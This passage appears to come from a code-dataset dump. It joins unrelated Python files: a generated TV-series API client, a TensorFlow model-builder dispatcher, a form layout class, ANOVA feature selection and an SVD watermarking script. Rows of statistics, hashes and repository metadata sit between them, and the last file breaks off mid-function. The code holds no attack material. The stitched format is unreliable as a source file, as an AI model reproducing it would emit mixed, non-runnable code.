    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_head(self, id, **kwargs):  # noqa: E501
    """series_id_head  # noqa: E501

    Returns header information only about the given series ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_head(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread; sync callers get the
    # helper's (None) result; either way it passes straight through.
    return self.series_id_head_with_http_info(id, **kwargs)  # noqa: E501
def series_id_head_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_head  # noqa: E501

    Returns header information only about the given series ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_head_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_head" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_head`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    # HEAD request: no response body, so response_type is None.
    return self.api_client.call_api(
        '/series/{id}', 'HEAD',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_images_get(self, id, **kwargs):  # noqa: E501
    """series_id_images_get  # noqa: E501

    Returns a summary of the images for a particular series  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_images_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesImagesCounts
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_images_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_images_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_images_get  # noqa: E501

    Returns a summary of the images for a particular series  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_images_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesImagesCounts
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_images_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_images_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/images' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/images', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesImagesCounts',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_images_query_get(self, id, **kwargs):  # noqa: E501
    """Query images for the given series ID.  # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous request,
    in which case the request thread is returned instead of the result.

    :param async_req bool
    :param int id: ID of the series (required)
    :param str key_type: Type of image being queried for (fanart, poster, etc.)
    :param str resolution: Resolution to filter by (e.g. 1280x1024)
    :param str sub_key: Subkey for the query keys; see /series/{id}/images/query/params
    :param str accept_language: Preferred language for translated fields
    :return: SeriesImageQueryResults
    """
    # Always unwrap to the data payload; whether sync or async, the
    # *_with_http_info call's return value is what the caller gets.
    kwargs['_return_http_data_only'] = True
    return self.series_id_images_query_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_images_query_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """Query images for the given series ID (full HTTP info variant).  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread.

    :param async_req bool
    :param int id: ID of the series (required)
    :param str key_type: Type of image being queried for (fanart, poster, etc.)
    :param str resolution: Resolution to filter by (e.g. 1280x1024)
    :param str sub_key: Subkey for the query keys; see /series/{id}/images/query/params
    :param str accept_language: Preferred language for translated fields
    :return: SeriesImageQueryResults
    """
    recognized = ('id', 'key_type', 'resolution', 'sub_key', 'accept_language',
                  'async_req', '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_images_query_get" % name
            )
    # 'id' is positional, so only a None value can be missing here.
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `series_id_images_query_get`")  # noqa: E501

    path_params = {'id': id}

    # Query parameters are only sent when explicitly supplied by the caller.
    query_params = []
    if 'key_type' in kwargs:
        query_params.append(('keyType', kwargs['key_type']))  # noqa: E501
    if 'resolution' in kwargs:
        query_params.append(('resolution', kwargs['resolution']))  # noqa: E501
    if 'sub_key' in kwargs:
        query_params.append(('subKey', kwargs['sub_key']))  # noqa: E501

    header_params = {}
    if 'accept_language' in kwargs:
        header_params['Accept-Language'] = kwargs['accept_language']  # noqa: E501
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/images/query', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SeriesImageQueryResults',  # noqa: E501
        auth_settings=['jwtToken'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def series_id_images_query_params_get(self, id, **kwargs):  # noqa: E501
    """Return the allowed query keys for the `/series/{id}/images/query` route.  # noqa: E501

    Contains a parameter record for each unique `keyType`, listing values
    that will return results. Synchronous by default; pass async_req=True
    to receive the request thread instead of the result.

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Preferred language for translated fields
    :return: SeriesImagesQueryParams
    """
    # Always unwrap to the data payload; the *_with_http_info call's
    # return value (thread or data) is handed straight back to the caller.
    kwargs['_return_http_data_only'] = True
    return self.series_id_images_query_params_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_images_query_params_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """Return the allowed query keys for `/series/{id}/images/query` (full HTTP info variant).  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread.

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Preferred language for translated fields
    :return: SeriesImagesQueryParams
    """
    recognized = ('id', 'accept_language', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_images_query_params_get" % name
            )
    # 'id' is positional, so only a None value can be missing here.
    if id is None:
        raise ValueError("Missing the required parameter `id` when calling `series_id_images_query_params_get`")  # noqa: E501

    path_params = {'id': id}
    query_params = []

    header_params = {}
    if 'accept_language' in kwargs:
        header_params['Accept-Language'] = kwargs['accept_language']  # noqa: E501
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/images/query/params', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SeriesImagesQueryParams',  # noqa: E501
        auth_settings=['jwtToken'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
| 45.087988
| 2,040
| 0.628508
| 7,310
| 58,930
| 4.844049
| 0.046238
| 0.048348
| 0.018978
| 0.0244
| 0.928325
| 0.922084
| 0.917848
| 0.913499
| 0.91076
| 0.908755
| 0
| 0.016257
| 0.283964
| 58,930
| 1,306
| 2,041
| 45.122511
| 0.822922
| 0.408502
| 0
| 0.797143
| 0
| 0
| 0.191432
| 0.049436
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.005714
| 0
| 0.094286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
609baf493b97a0be785c4717bc1e541aa3bf2b97
| 5,758
|
py
|
Python
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 34
|
2018-12-19T01:00:57.000Z
|
2021-03-26T09:36:37.000Z
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 11
|
2018-12-25T03:37:59.000Z
|
2021-08-25T14:43:58.000Z
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 9
|
2018-12-27T08:00:44.000Z
|
2020-06-08T03:05:14.000Z
|
try:
from .model_fn import model_fn_builder
from .model_distillation_fn import model_fn_builder as model_distillation_builder_fn
from distributed_pair_sentence_classification.bert_model_fn import model_fn_builder as bert_nli_builder_fn
from distributed_pair_sentence_classification.interaction_model_fn import model_fn_builder as interaction_builder_fn
from distributed_pair_sentence_classification.interaction_distillation_model_fn import model_fn_builder as interaction_distillation_builder_fn
from .embed_model_fn import model_fn_builder as embed_model_fn_builder
from .model_feature_distillation_fn import model_fn_builder as feature_distillation_fn_builder
from .model_mdd_distillation import model_fn_builder as mdd_distillation_fn_builder
from .model_relation_distillation import model_fn_builder as rkd_distillation_fn_builder
from distributed_pair_sentence_classification.interaction_rkd_distillation_model_fn import model_fn_builder as interaction_rkd_distillation
# from pretrain_finetuning.classifier_fn_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from pretrain_finetuning.classifier_fn_tpu_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from .model_distillation_adv_adaptation import model_fn_builder as model_distillation_adv_adaptation_build_fn
from distributed_gpt.model_fn import model_fn_builder as gpt_lm_builder_fn
from chid_nlpcc2019.model_fn import model_fn_builder as chid_model_fn_builder
from chid_nlpcc2019.model_fn_crf import model_fn_builder as chid_crf_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_bert_seq_estimator import classifier_model_fn_builder as bert_seq_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_gatedcnn_estimator import classifier_model_fn_builder as gatedcnn_model_fn_builder
except:
from model_fn import model_fn_builder
from model_distillation_fn import model_fn_builder as model_distillation_builder_fn
from distributed_pair_sentence_classification.bert_model_fn import model_fn_builder as bert_nli_builder_fn
from distributed_pair_sentence_classification.interaction_model_fn import model_fn_builder as interaction_builder_fn
from distributed_pair_sentence_classification.interaction_distillation_model_fn import model_fn_builder as interaction_distillation_builder_fn
from embed_model_fn import model_fn_builder as embed_model_fn_builder
from model_feature_distillation_fn import model_fn_builder as feature_distillation_fn_builder
from model_mdd_distillation import model_fn_builder as mdd_distillation_fn_builder
from model_relation_distillation import model_fn_builder as rkd_distillation_fn_builder
from distributed_pair_sentence_classification.interaction_rkd_distillation_model_fn import model_fn_builder as interaction_rkd_distillation
# from pretrain_finetuning.classifier_fn_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from pretrain_finetuning.classifier_fn_tpu_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from model_distillation_adv_adaptation import model_fn_builder as model_distillation_adv_adaptation_build_fn
from distributed_gpt.model_fn import model_fn_builder as gpt_lm_builder_fn
from chid_nlpcc2019.model_fn import model_fn_builder as chid_model_fn_builder
from chid_nlpcc2019.model_fn_crf import model_fn_builder as chid_crf_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_bert_seq_estimator import classifier_model_fn_builder as bert_seq_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_gatedcnn_estimator import classifier_model_fn_builder as gatedcnn_model_fn_builder
import tensorflow as tf
def model_fn_interface(FLAGS):
    """Select the model_fn builder matching FLAGS.task_type / FLAGS.distillation.

    Dispatches over the task type first, then (for classification tasks)
    over the distillation mode. Falls through and returns None for an
    unrecognized task type, matching the original behavior.
    """
    print("==apply {} {} model fn builder==".format(FLAGS.task_type, FLAGS.distillation))

    single_sentence_tasks = (
        "single_sentence_classification",
        "single_sentence_multilabel_classification",
        "single_sentence_multilabel_classification_bert",
        "single_sentence_classification_bert",
    )
    if FLAGS.task_type in single_sentence_tasks:
        # Unknown distillation modes default to the plain builder, exactly
        # like the original if/elif chain's trailing else.
        by_mode = {
            "distillation": model_distillation_builder_fn,
            "feature_distillation": feature_distillation_fn_builder,
            "mdd_distillation": mdd_distillation_fn_builder,
            "rkd_distillation": rkd_distillation_fn_builder,
            "adv_adaptation_distillation": model_distillation_adv_adaptation_build_fn,
        }
        return by_mode.get(FLAGS.distillation, model_fn_builder)

    if FLAGS.task_type == "pair_sentence_classification":
        # Every distillation mode uses the same NLI builder here.
        return bert_nli_builder_fn

    if FLAGS.task_type == "interaction_pair_sentence_classification":
        by_mode = {
            "distillation": interaction_distillation_builder_fn,
            "rkd_distillation": interaction_rkd_distillation,
        }
        return by_mode.get(FLAGS.distillation, interaction_builder_fn)

    if FLAGS.task_type == "embed_sentence_classification":
        return embed_model_fn_builder
    if FLAGS.task_type == "bert_pretrain":
        return bert_pretrain_finetuning
    if FLAGS.task_type == "gpt_pretrain":
        return gpt_lm_builder_fn
    if FLAGS.task_type == "bert_chid":
        return chid_model_fn_builder
    if FLAGS.task_type == "bert_chid_crf":
        return chid_crf_model_fn_builder
    if FLAGS.task_type == "bert_seq_lm":
        tf.logging.info("****** bert seq lm ******* ")
        return bert_seq_model_fn_builder
    if FLAGS.task_type == "gatedcnn_seq_lm":
        tf.logging.info("****** bert gatedcnn_seq_lm ******* ")
        return gatedcnn_model_fn_builder
    # Implicit: returns None for any other task type.
| 59.979167
| 143
| 0.869225
| 815
| 5,758
| 5.631902
| 0.068712
| 0.111329
| 0.164706
| 0.118519
| 0.875599
| 0.837255
| 0.747059
| 0.726144
| 0.686928
| 0.662745
| 0
| 0.00306
| 0.091872
| 5,758
| 95
| 144
| 60.610526
| 0.874737
| 0.038729
| 0
| 0.37931
| 0
| 0
| 0.100145
| 0.049892
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011494
| false
| 0
| 0.402299
| 0
| 0.643678
| 0.011494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
716c8530c3806d943baad3a778449fc4d9f2e319
| 108
|
py
|
Python
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 15
|
2020-04-07T10:27:33.000Z
|
2022-03-07T13:25:40.000Z
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 13
|
2022-02-21T10:24:59.000Z
|
2022-03-28T11:26:58.000Z
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 5
|
2021-02-24T13:57:17.000Z
|
2021-09-27T10:11:58.000Z
|
from crispy_forms import layout as crispy_forms_layout
class Layout(crispy_forms_layout.Layout):
    """Layout container; currently identical to ``crispy_forms_layout.Layout``.

    NOTE(review): no behavior is added here — presumably this subclass exists
    so callers import ``Layout`` from this package rather than from
    crispy_forms directly; confirm before extending.
    """
    pass
| 18
| 54
| 0.824074
| 16
| 108
| 5.25
| 0.5
| 0.392857
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 108
| 5
| 55
| 21.6
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
7173fe05e1485e36396bb47b2c985b2980cffa5e
| 4,295
|
py
|
Python
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2021-06-12T15:17:34.000Z
|
2021-06-12T15:17:34.000Z
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2022-02-20T06:45:12.000Z
|
2022-02-20T06:45:12.000Z
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2021-05-31T15:44:25.000Z
|
2021-05-31T15:44:25.000Z
|
from auto_machine_learning.utils import *
from sklearn.feature_selection import f_classif, SelectKBest
from sklearn.model_selection import train_test_split
from sklearn import metrics
from math import ceil, sqrt, log2
#---------------------------------------------------------------------------------------------------------------------#
def anova_regressor(dataset, label, anova_estimator='RandomForestRegressor'):
    '''
    Anova (analysis of variance) is used to select features for regression.

    Tries K = ceil(log2(n)), ceil(sqrt(n)) and n features (n = total feature
    count), scores each reduced feature set with the estimator's R^2 score on
    a 70/30 split, and keeps the best-scoring K.

    Parameters:
        dataset (dataframe): data to be used for training model
        label (string): target column of the dataframe
        anova_estimator (model class reference or name string)

    Returns:
        dataset (dataframe): selected feature columns plus the label column

    Raises:
        Exception: if SelectKBest fails to compute the feature scores
    '''
    anova_estimator = get_model(anova_estimator)
    features = get_features(dataset, label)
    n = len(features)
    # Candidate values for K: logarithmic, square-root and full feature counts
    numberOfFeatures = [ceil(log2(n)), ceil(sqrt(n)), n]
    X, Y = dataset[features], dataset[label]
    optimal_k = -1
    max_score = float('-inf')
    for k in numberOfFeatures:
        try:
            selector = SelectKBest(f_classif, k=k)
            selector.fit(X, Y)
            columns = selector.get_support(indices=True)
            important_features = X.iloc[:, columns].columns
        except Exception as e:
            print(e)
            raise Exception("Error in finding important features ")
        X_reduced = dataset[important_features]
        X_train, X_test, Y_train, Y_test = train_test_split(X_reduced, Y, test_size=0.3, random_state=1)
        model = anova_estimator()
        model.fit(X_train, Y_train)
        score = model.score(X_test, Y_test)
        if score > max_score:
            max_score = score
            optimal_k = k
    # Re-fit with the best K and use THAT selector's support.
    # Bug fix: previously the indices were assigned to `column` but the
    # final selection reused stale `columns` from the last loop iteration.
    selector = SelectKBest(f_classif, k=optimal_k)
    selector.fit(X, Y)
    columns = selector.get_support(indices=True)
    important_features = list(X.iloc[:, columns].columns)
    important_features.append(label)
    X = dataset[important_features]
    return X
#---------------------------------------------------------------------------------------------------------------------#
def anova_classifier(dataset, label, anova_estimator='RandomForestClassifier'):
    '''
    Anova (analysis of variance) is used to select features for classification.

    Tries K = ceil(log2(n)), ceil(sqrt(n)) and n features (n = total feature
    count), scores each reduced feature set by accuracy on a 70/30 split, and
    keeps the best-scoring K.

    Parameters:
        dataset (dataframe): data to be used for training model
        label (string): target column of the dataframe
        anova_estimator (model class reference or name string)

    Returns:
        dataset (dataframe): selected feature columns plus the label column

    Raises:
        Exception: if SelectKBest fails to compute the feature scores
    '''
    anova_estimator = get_model(anova_estimator)
    features = get_features(dataset, label)
    n = len(features)
    # Candidate values for K: logarithmic, square-root and full feature counts
    numberOfFeatures = [ceil(log2(n)), ceil(sqrt(n)), n]
    X, Y = dataset[features], dataset[label]
    optimal_k = -1
    max_score = float('-inf')
    for k in numberOfFeatures:
        try:
            selector = SelectKBest(f_classif, k=k)
            selector.fit(X, Y)
            columns = selector.get_support(indices=True)
            important_features = X.iloc[:, columns].columns
        except Exception as e:
            raise type(e)("Error in finding important features")
        X_reduced = dataset[important_features]
        X_train, X_test, Y_train, Y_test = train_test_split(X_reduced, Y, test_size=0.3, random_state=1)
        model = anova_estimator()
        model.fit(X_train, Y_train)
        Y_pred = model.predict(X_test)
        score = metrics.accuracy_score(Y_test, Y_pred)
        if score > max_score:
            max_score = score
            optimal_k = k
    # Re-fit with the best K and use THAT selector's support.
    # Bug fix: previously the indices were assigned to `column` but the
    # final selection reused stale `columns` from the last loop iteration.
    selector = SelectKBest(f_classif, k=optimal_k)
    selector.fit(X, Y)
    columns = selector.get_support(indices=True)
    important_features = list(X.iloc[:, columns].columns)
    important_features.append(label)
    X = dataset[important_features]
    return X
#---------------------------------------------------------------------------------------------------------------------#
| 36.398305
| 119
| 0.595576
| 491
| 4,295
| 5.032587
| 0.207739
| 0.089437
| 0.046135
| 0.019425
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0
| 0.003375
| 0.241211
| 4,295
| 117
| 120
| 36.709402
| 0.754833
| 0.299418
| 0
| 0.811594
| 0
| 0
| 0.041781
| 0.014726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.246377
| 0
| 0.304348
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71c1dfa9068d28774bc922fc0a1c22c7b6df071e
| 30,376
|
py
|
Python
|
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | 1
|
2021-12-09T13:34:44.000Z
|
2021-12-09T13:34:44.000Z
|
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | null | null | null |
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import os
import imageio
from timeit import timeit
from mpl_toolkits import mplot3d
from PIL import Image
#import png
import svd_tools_copy as svdt
import image_tools_copy as it
#import ../../../david/watermark as watermarktools
#sunset = it.load_image('../res/sunset.png')
#rainbow = it.load_image('../res/rainbow.png')
#view = it.load_image('../res/view.png')
# Test images used by the experiments below (paths relative to this script).
view = it.load_image('../res/view.jpg')
tree = it.load_image('../res/tree.jpg')
# Global matplotlib font size for all figures produced by this module.
plt.rcParams['font.size'] = '18'
def sv_plot_save(img, fname):
    """Plot the singular values of an image and save the figure to `fname`.

    The color channels are stacked into a single 2-D matrix (rows x
    (cols*channels)) before taking the SVD, so this can only be used on a
    stacked matrix view of the image.
    """
    # formatting
    img = img.astype(np.float64)
    # stacking color channels into a 2-D matrix
    img_rows, img_columns = img.shape[:2]
    img_stacked = img.reshape(img_rows, -1)
    # Only the singular values are needed; skip computing U and V entirely
    # (the original computed and discarded them).
    s = np.linalg.svd(img_stacked, compute_uv=False)
    plt.plot(s)
    plt.savefig(fname)
#EXTRACTION ERROR = NORM(ORIGINAL WATERMARK - EXTRACTED WATERMARK)
#1. COMPUTE EMBEDDING AND EXTRACTION
#2. COMPUTE NORM(ORIGINAL WATERMARK - EXTRACTED WATERMARK)/NORM(ORIGINAL WATERMARK)
def reversepad(watermark_extracted, original_watermark):
    """Crop an extracted watermark back to the original watermark's 2-D size.

    Embedding may pad the watermark; this trims the extracted array to the
    original's first two dimensions (rows, columns).
    """
    rows, cols = original_watermark.shape[0], original_watermark.shape[1]
    return watermark_extracted[:rows, :cols]
def reversepad3d(watermark_extracted, original_watermark):
    """Crop an extracted watermark back to the original's 3-D size.

    Same idea as `reversepad`, but also trims the third (channel) axis.
    """
    rows, cols, depth = (original_watermark.shape[0],
                         original_watermark.shape[1],
                         original_watermark.shape[2])
    return watermark_extracted[:rows, :cols, :depth]
def watermark_embed_liutan(img, watermark, scale, save):
    """Embed `watermark` into `img` with the Liu-Tan SVD scheme.

    Returns the watermarked image when save == 'no'; writes it to
    out/watermarking/watermarked_image/liutan when save == 'yes'
    (any other value is a silent no-op, as before).
    """
    marked, _u, _s, _vh = it.embed_watermark(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    if save == 'no':
        return marked
    if save == 'yes':
        it.save_image(marked, '../out/watermarking/watermarked_image/liutan/watermarked_image_alpha_{}.png'.format(scale))
def watermark_extract_liutan(img, watermark, scale, save):
    """Embed then extract a watermark with the Liu-Tan scheme (round trip).

    Returns the recovered watermark when save == 'no'; writes it to
    out/watermarking/extracted_watermark/liutan when save == 'yes'.
    """
    marked, key_u, key_s, key_vh = it.embed_watermark(img, watermark, scale=scale)
    recovered = it.extract_watermark(marked, key_u, key_s, key_vh,
            scale=scale)
    recovered = reversepad(recovered, watermark).astype(np.int32)
    if save == 'no':
        return recovered
    if save == 'yes':
